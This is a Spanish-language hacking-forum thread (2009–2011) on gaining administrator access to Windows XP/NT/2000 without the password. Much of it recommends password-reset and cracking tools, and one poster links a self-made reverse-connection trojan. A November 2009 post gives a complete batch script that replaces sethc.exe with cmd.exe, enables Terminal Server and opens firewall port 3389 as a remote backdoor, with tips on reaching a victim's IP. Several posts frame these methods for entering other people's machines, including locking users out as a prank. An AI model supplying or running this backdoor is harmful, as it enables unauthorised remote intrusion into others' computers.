este malware mio, te podria crear con la opcion backdoor una puerta trasera como la del stiky keys, los que sepan de lo que hablo, aqui os dejo la url

se que es un troyano, pero si se usa logica, nos podemos meter el troyano a nosotros mismos,generar la backdorr y luego borrar la entrada de inicio y el proceso del troyano

aqui os lo dejo:

http://foro.elhacker.net/analisis_y_diseno_de_malware/vb_60_dioxis_trojan_conexion_inversa_by_50l3r-t255645.0.html


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: sk8erboi en 26 Mayo 2009, 05:12 am
no importa el metodo que utilizes lo que importa es que funcione


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: 50l3r en 26 Mayo 2009, 12:30 pm
yo me quedare siempre con mis puertas traseras :))


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Siscu.cab en 1 Junio 2009, 08:05 am
A ver la verdad es que el programa funciona y no tienes que tocar ni modificar nada ...


Título: Any
Publicado por: any en 14 Junio 2009, 18:59 pm
 >:(


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: 50l3r en 14 Junio 2009, 22:55 pm
la verdad que el hiren es una herrmienta para llevar a todos lados

apoyo la mocion  :P


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: OzdoX en 15 Junio 2009, 21:37 pm
no importa el metodo que utilizes lo que importa es que funcione

eso incluye los troyanos ? xd 


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: sk8erboi en 16 Junio 2009, 00:58 am
Citar
eso incluye los troyanos ? xd
si a ti te va bien con los troyanos felicidades,o sea la idea correcta, segun mi opinion es que cada cual logre el objetivo


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: 50l3r en 16 Junio 2009, 01:14 am
la verdad que si alguno me diria que tiene contraseña en su windows que no podre entrar, me reiria por dentro  :-X


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: sk8erboi en 16 Junio 2009, 01:54 am
Citar
la verdad que si alguno me diria que tiene contraseña en su windows que no podre entrar, me reiria por dentro
si eso es verdad  :xD yo tambien lo haria...pero no es lo mismo una simple contrasenya tipo :
nombre de usuario:maria
contrasenya: mariaamor
y que el(la)usuario solo sepa dar click en inicio para sacar el yahoo messenger
a que una pc con una contrasenya de mas de 20 caracteres(minusculas,mayusculas,numeros y signos),con una supervicion extricta con su av actualizado y un firewall bien duro,etc,etc
.........Les cuento una anecdota una vez en cuba fui a reparar una pc a una casa ,el problema era el siguiente la pc tenia un modem interno(pci) que un buen dia dejo de funcionar y entonces consiguieron un modem externo(usb)
Pero no se podian conectar ni con el modem usb,al llegar a la pc lo primero que hice fue ir a administrador de dispositivos(era win xp sp2)y deshabilitar el modem pci, y comprobar que el otro estaba ok pero al darle a conectar nada pasaba
Entonces lo que hice fue ir a la configuracion de la conexion y cambiar el modem a utilizar para realizar la conexion,estaba puesto el pci,asi que al cambiar y poner que utilizara el usb,todo resuelto,se conecto inmediatamente y sin ningun problema......yo cobre mi dinero  y me fui
a donde queria llegar es que en esa casa vivia un mujer con su hija de 18 anyos(por cierto estaba muy buena y bonita pero tambien era muy burra,o sea tenia las tres "b")esa chica de 18 anyos estudiaba informatica y no supo arreglar eso por su propia cabezita,y y lo mas risa interna me dio es que al ver que habia conexion lo primero que hizo fue abrir el messenger,o sea que hay muchos usuarios que tienen la cabeza por gusto  :o :o :o :o :o


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: 50l3r en 16 Junio 2009, 10:53 am
voy a poner un post de contar anecdotas, que tengo una muy buena  ;)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: marmartinez en 18 Junio 2009, 19:47 pm
Coforeros como andan? Espero que bien...

Les comento...  trabajo en una empresa en la cual nos conectamos remotamente de las sucursales por escritorio remoto a un servidor donde tiene W2000 Server.. el tema es que cambiaron la contraseña de administrador y dado que queda muy distante no puedo probar con el CIA... alguien se le ocurre como recuperar la contraseña?
Gracias.

Marcos. :D


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: sk8erboi en 18 Junio 2009, 19:50 pm
Citar
Coforeros como andan? Espero que bien...

Les comento...  trabajo en una empresa en la cual nos conectamos remotamente de las sucursales por escritorio remoto a un servidor donde tiene W2000 Server.. el tema es que cambiaron la contraseña de administrador y dado que queda muy distante no puedo probar con el CIA... alguien se le ocurre como recuperar la contraseña?
Gracias.
:¬¬ :¬¬ :silbar: investiga  en google,no te digo mas pues creo que son ideas maleficas >:(


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: 50l3r en 18 Junio 2009, 21:07 pm
que permisos tienes?

usuario limitado?

etc


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: sk8erboi en 18 Junio 2009, 21:12 pm
Citar
que permisos tienes?

usuario limitado?

etc
no te unas al lado oscuro jejeejje  :P :P


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: 50l3r en 18 Junio 2009, 21:24 pm
si se cree que le voy a dar la solucion de entrar a un "WINDOWS" no, no se lo dare

pero si es usuario limitado, sera por algo, y si es admin que no creo, que se lo comunique al superusuario que este jerarquicamente mas alla de sus poderes xD

yo creo que no es en su empresa, sino que es un servidor que se ha encontrado con ts habilitado y que quiere acceder a su administracion

estoy 80% seguro jaja


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: sk8erboi en 18 Junio 2009, 21:57 pm
Citar
si se cree que le voy a dar la solucion de entrar a un "WINDOWS" no, no se lo dare

pero si es usuario limitado, sera por algo, y si es admin que no creo, que se lo comunique al superusuario que este jerarquicamente mas alla de sus poderes xD

yo creo que no es en su empresa, sino que es un servidor que se ha encontrado con ts habilitado y que quiere acceder a su administracion

estoy 80% seguro jaja
+1


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: marmartinez en 19 Junio 2009, 04:08 am
jaja... seguro que no es mi empresa solo soy empleado  ;)

el tema es asi me conecto remotamente desde mi of a travez del Esc Rem a un W2000 donde se encuentra una base de datos en SQL... lo que hago es actualizar un ejecutable hecho en VFP... asi cuando las pcs encienden se fijan en este servidor si hay una nueva version y si es asi se actualiza el programita. El problema es que alguien cambio la contraseña y cuando llamo me dicen "que nadie fue" y no me puedo conectar mas. Pero bueno seguire buscando si encuentra algo lo posteo. Gracias! Saludos!.

 :)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: roco446 en 14 Julio 2009, 22:05 pm
Hola. Estoy buscando ayuda ya que segui el tutorial de "Azazel" de la primera pagina y cuando reinicio windows con el floppy no me arranca nada nisiquiera se para a leer la unidad de diskette, sin embargo el programa si me instalo el arranque bien. Ayudenme profavor, gracias ;-)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: DenieruMza en 30 Julio 2009, 18:26 pm
Probá entrando al SETUP de la PC, y fijate que la secuencia de booteo esté en orden (o sea, para arrancar primero del floppy), o bien en algunos dispositivos de hardware se te permite mediante alguan tecla F (F12 por ejemplo) seleccionar por única vez, desde donde bootear. Fijate, seguro que es eso, o algo hiciste mal o tenes una mala copia del programa.

O sino tenes esta otra opción:

El que lo necesite mandeme un PM, que le paso un link o se lo mando yo al mail, con una ISO lista para quemarse en un CD del CIA COMMANDER. La unidad óptica me ha resultado más práctica de utilizar que el diskette, sin embargo de esta última manera  también se puede.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: CrAzY_Dangerous en 14 Septiembre 2009, 05:47 am
a ver si alguien me ayuda:
resulta que necesito recuperar el pass del admin de mi PC pero no me ha dado resultado ni con el cia commander ni con el ERD ni con el mini PE
 y resulta que ninguno me da error, le doy a cambiar el pass y me dice que todo bien y cuando trato de entrar con el nuevo pass no me deja...
quien me puede ayudar porfiss..
Gracias de antemano


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: 50l3r en 14 Septiembre 2009, 11:35 am
si cambias la pass y esta no entra puede que tengas algun archivo que de ordenes constantes de cambio de pass al admin

lo que puedes hacer es mirar todo tu pc en busca de esos virus o con algun programa averiguarla


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: n3fisto en 9 Noviembre 2009, 04:49 am
control userpasswords2


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: 50l3r en 9 Noviembre 2009, 09:10 am
Código:
@echo off
title Terminal Server Backdoor
color 0a

copy /y %homedrive%\Windows\system32\sethc.exe %homedrive%\Windows\system32\sethc.cpy>nul
copy /y %homedrive%\Windows\system32\cmd.exe %homedrive%\Windows\system32\sethc.exe>nul

reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /d 0 /t reg_dword /f>nul
netsh firewall add portopening all 3389 terminal>nul

qaBhqvytK3A



Este Script en batch lo que hace es crear una cmd que salga al apretar 5 veces la tecla shift, es decir, remplaza al sticky keys de windows y funciona en todas sus plataformas desde win 95 a win 7

Luego abre el terminal server y añade una excepcion al firewall

Luego os falta averiguar su ip y que tenga modem ya que si tiene router y no tiene abierto el puerto 3389 del ts no funcionara


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: stargatespawn en 4 Febrero 2010, 02:47 am
lo que yo recomiendo si es que se les olvido la contraseña es que busquen un cd de arranque booteable que les borre el usuario y despues sacan el cd reinician la pc y listo queda virgen sin ningun usuario al inicio y con eso se evitan tanto rollo.Lo unico malo de esta forma es que si no es por olvido de contraseña y lo que querian era entrar a la maquina de alguien el otro se va a enterar de que entraron a la fuerza a su maquina cuando no encuentre al encender la maquina su usuario.hasta lo pueden usar para gastar una broma despues de borrar el usuario crean uno ustedes con el mismo nombre pero con otra contraseña y cuando quiera entrar no va a poder ;D .bueno en este momento no encuentro el nombre del cd booteable pero si a alguno le interesa busquenlo en internet como Hiren's Boot y bajenlo


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: icarito28762 en 7 Marzo 2010, 13:12 pm
Amigo Stargatespawn
Nos podrias ayudar dandonos la recomendacion del nombre del programa que se pudiese utizar???? Te lo agradecemos de antemano. Saludos


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: icarito28762 en 24 Marzo 2010, 19:42 pm
Hola amigos.
Les comento que habiendo leido las 15 pag de este post, probe el Cia Commander con TODO EXITO y pude conseguir, averiguar y cambiar la clave del Administrador.
Sin embargo, entre los post lei que LASTIMOSAMENTE no funciona con CD, sino con Floppy. Nadie ha escrito si esto es factible. O x si acaso, exista otro programa con similares caracteristicas pero que pueda ser usado con CD cuando haces el reboot de tu PC. Ya son muy pocas PC que mantienen el floppy diskette. Me ayudan por favor???Gracias


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Novlucker en 24 Marzo 2010, 19:46 pm
El CIA COMMANDER aún funciona, pero ya esta algo desfasado en el tiempo :rolleyes:
Hiren's BootCD (https://foro.elhacker.net/software/cds_autoarrancables_para_casos_de_emergencia-t204137.0.html), en él tienes varias utilidades para realizar esta tarea ;)

Saludos


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: icarito28762 en 24 Marzo 2010, 21:58 pm
Gracias Amigo por la informacion. Solo ayudame en discifrar ciertas dudas. Con el Hiren CD, una vez grabado en el CD, reinicias la PC con el Cd dentro y asi poder utilizarlo. Gracias y Saludos nuevamente


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Novlucker en 25 Marzo 2010, 01:41 am
El Hiren's no es solo un programa para quitar contraseñas, es un compendio de programas utiles para administradores, te sugiero que le des un vistazo más de cerca ;)

Saludos


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: icarito28762 en 25 Marzo 2010, 13:04 pm
Gracias Amigo, vere si puedo conseguirme un manual para su uso, pro por el momento, tengo la v.10 (creo q es la mas reciente) y la quemare en un CD (iso) autoarrancable. Saludos


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: :ohk<any> en 29 Junio 2010, 16:48 pm
El cia commander ya paso de moda jejeje, mejor usar el ophcrack.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: angelrobi en 30 Diciembre 2010, 04:58 am
hiren boot cd que me ha salvado en varias ocasiones es un CD completo con varias funciones saludos que tengan un exelente año nuevo


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: ares- en 23 Enero 2011, 17:46 pm
una pregunta , pero si no puedes entrar a la interfaz de la victima , como logras ejecutar el CIA Commander?


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Tonitito en 24 Enero 2011, 16:19 pm
yo para sacar las pass de xp utilizo un cd que arranca y saca todas las claves sin haacer nada, se puede descargar desde aqui
http://ophcrack.sourceforge.net/

Espero que sirva de ayuda


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: db en 25 Febrero 2011, 16:37 pm
el programa es muy bueno el problema es que ya las maquinas de ahora no traen launidad de diskete como puedo utilizar el programa en este caso


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Novlucker en 26 Febrero 2011, 02:56 am
En CD, ahora hay muchas más alternativas a esta :P


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: simorg en 26 Febrero 2011, 03:04 am
Incluso la misma en Live CD... :P


 ;)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Gambinoh en 16 Abril 2011, 00:09 am
hiren boot cd que me ha salvado en varias ocasiones es un CD completo con varias funciones saludos que tengan un exelente año nuevo

Sí, yo también lo tenía (brutal por cierto), ¿era el Hiren's Boot 12 o algo así no?

Esta es la del actual Hiren's Boot 13.2:

http://www.hiren.info/pages/bootcd